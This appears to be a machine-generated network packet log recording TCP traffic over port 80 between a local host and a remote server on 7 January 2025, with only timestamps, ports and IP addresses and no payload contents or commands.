Jan 7, 2025 13:25:04.330019951 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.330029011 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.330040932 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.330053091 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.330054045 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.330086946 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.503767967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503784895 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503796101 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503808022 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503819942 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503832102 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.503895044 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.503990889 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504012108 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504031897 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504044056 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504066944 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504071951 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504089117 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504354000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504400969 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504437923 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504467964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504479885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504492998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504514933 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504523039 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504533052 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504548073 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504564047 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504573107 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504592896 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504605055 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504612923 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504631042 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504653931 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504664898 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504674911 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504676104 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504698992 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504705906 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504717112 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504719019 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504729033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504759073 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504815102 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504837036 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504853964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504865885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504879951 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504899979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504905939 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504913092 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504934072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504941940 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504951000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504961967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504973888 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.504973888 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504996061 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.504998922 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505011082 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505043030 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505323887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505333900 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505371094 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505390882 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505417109 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505420923 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505439043 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505465984 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505476952 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505491972 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505501032 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505512953 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505526066 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505549908 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505561113 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505565882 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505609035 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505712986 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505743980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505755901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505784035 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505809069 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505820990 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505848885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505876064 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505887985 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505930901 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.505961895 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505975008 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505986929 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.505997896 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506009102 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506019115 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506050110 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506062031 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506072998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506094933 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506120920 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506127119 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506138086 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506150007 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506181002 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506205082 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506217957 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506227970 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506243944 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506252050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506264925 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506278038 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506315947 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506330967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506342888 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506376028 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506422997 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506433964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506445885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506455898 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506468058 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506479025 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506485939 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506522894 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506654024 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506714106 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506726980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506752014 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506777048 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506788969 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506824970 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506824970 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506844044 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506858110 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506870031 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506892920 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506895065 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.506902933 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.506938934 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507040977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507051945 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507061958 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507086992 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507087946 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507097006 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507122993 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507133961 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507143974 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507152081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507174015 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507190943 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507210016 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507227898 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507255077 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507272959 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507281065 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507285118 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507318020 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507563114 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507589102 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507600069 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507637024 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507642031 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507647991 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507668972 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507682085 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507694006 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507714987 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507735014 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507766008 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507776022 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507788897 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507810116 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507843018 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507853985 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507882118 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.507932901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507945061 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507956028 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.507978916 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.508006096 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.508014917 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508025885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508045912 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508059978 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508066893 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.508100986 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.508122921 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508132935 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508143902 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.508171082 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.554570913 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594544888 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594582081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594594002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594604969 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594616890 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594645977 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594676971 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594690084 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594702005 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594715118 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594721079 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594746113 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594825029 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594835997 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594846964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594857931 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594876051 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594881058 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594887018 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594902039 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594938040 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594949007 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594959021 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.594975948 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594975948 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.594999075 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595026970 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595037937 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595057964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595072031 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595082045 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595093012 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595104933 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595211983 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595268011 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595273018 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595288992 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595308065 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595338106 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595351934 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595356941 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595381021 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595383883 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595398903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595423937 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595428944 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595437050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595449924 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595463991 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595468998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595488071 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595491886 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595529079 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595540047 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595547915 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.595550060 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.595577002 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596013069 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596060038 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596070051 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596071005 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596105099 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596117020 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596122026 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596127033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596151114 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596204042 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596224070 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596249104 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596250057 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596261024 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596276999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596292019 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596302986 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596307993 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596314907 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596335888 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596376896 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596389055 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596400023 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596421957 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596425056 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596436024 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596446037 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596447945 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596498013 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596509933 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596515894 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596520901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596544981 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596575022 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596585989 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596596956 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596606016 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596617937 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596630096 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596653938 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596662998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596673965 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596704960 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596718073 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596724987 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596728086 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596770048 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596780062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596791029 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596801996 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596812963 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596826077 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596829891 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596854925 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596873045 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.596970081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596982002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.596999884 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597012043 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597022057 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597023010 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597047091 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597059965 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597064018 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597069979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597081900 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597106934 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597111940 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597119093 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597130060 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597141981 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597177029 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597239971 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597253084 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597264051 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597289085 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.597553968 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597564936 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597575903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597598076 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.597615957 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.649560928 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.768282890 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768307924 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768321037 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768332958 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768346071 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768387079 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.768587112 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768599987 CET	80	49717	166.62.27.188	192.168.2.5
